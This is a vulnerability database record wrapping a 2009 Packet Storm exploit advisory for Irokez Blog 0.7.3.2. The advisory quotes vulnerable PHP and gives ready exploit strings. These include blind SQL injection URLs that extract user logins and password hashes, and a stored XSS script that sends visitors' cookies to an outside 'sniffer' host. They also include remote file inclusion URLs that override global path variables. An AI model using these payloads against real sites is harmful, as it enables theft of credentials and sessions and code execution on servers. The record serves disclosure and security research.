{"id": "PACKETSTORM:75248", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Irokez Blog 0.7.3.2 XSS / RFI / SQL Injection", "description": "", "published": "2009-02-27T00:00:00", "modified": "2009-02-27T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/75248/Irokez-Blog-0.7.3.2-XSS-RFI-SQL-Injection.html", "reporter": "Corwin", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:27:58", "viewCount": 11, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "c11c860fbc5eafa5aade642c3e078997"}, "sourceHref": "https://packetstormsecurity.com/files/download/75248/irokez-sqlxss.txt", "sourceData": "`================================================================================ \n|| Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS \n================================================================================ \n \nApplication: Irokez Blog \n------------ \nWebsite: http://irokez.org \n-------- \nVersion: All (0.7.3.2) \n-------- \nDate: 11-02-2009 \n----- \n \n[ BLIND SQL-INJECTION ] \n \n[ SOME VULNERABLE CODE ] \n \n/classes/table.class.php \n \n... \nif ($is_trans) { \n$query = \"select t.*, m.* from {$this->_name} m\" \n. \" left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)\" \n. \" where m.id = '$id' group by {$this->_lang}\"; \n} else { \n$query = \"select * from {$this->_name} where id = '$id'\"; \n} \n$result = $this->db->exeQuery($query); \n \n===>>> Exploit: \n \nhttp://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115 \nhttp://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114 \netc \n \n[ ACTIVE XSS ] \n \nin comments. \n \n[ SOME VULNERABLE CODE ] \n \n/scripts/blog/output-post.inc.php \n \n<input id=\"name\" type=\"text\" class=\"text\" name=\"name\" value=\"<?php echo $name?>\" /> \n<label for=\"name\"><?php echo $GLOBALS['LANG']['blog']['name']?></label> \n</li> \n<li> \n<input id=\"email\" type=\"text\" class=\"text\" name=\"email\" value=\"<?php echo $email?>\" /> \n<label for=\"email\"><?php echo $GLOBALS['LANG']['blog']['email']?></label> \n</li> \n<li> \n<input id=\"site\" type=\"text\" class=\"text\" name=\"site\" value=\"<?php echo $site?>\" /> \n<label for=\"site\"><?php echo $GLOBALS['LANG']['blog']['site']?></label> \n... \n<textarea id=\"message\" name=\"message\" class=\"textarea\"><?php echo $message?></xtextarea> \n \n===>>> Exploit: \n \n<script>img = new Image(); img.src = \"http://sniffer/sniff.jpg?\"+document.cookie;</script> \n \n[ INCLUDE ] \n \n[ SOME VULNERABLE CODE ] \n \n/thumbnail.php \n... \nob_start(); \nswitch ($module) { \ncase 'gallery': \ninclude_once $GLOBALS['PTH']['classes'] . 'gallery.class.php'; \n$Obj = new TBL_Gallery; \n$image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src'); \nbreak; \ndefault: \n$image_path = ''; \n} \n \n===>>> Exploit: \n \nhttp://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include] \nhttp://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include] \nhttp://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include] \nhttp://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include] \n \nAuthor: Eugene \"Corwin\" Ermakov \n------- \n \nContact: corwin88[dog]mail[dot]ru \n-------- \n \n`\n"}
{}
Irokez Blog 0.7.3.2 XSS / RFI / SQL Injection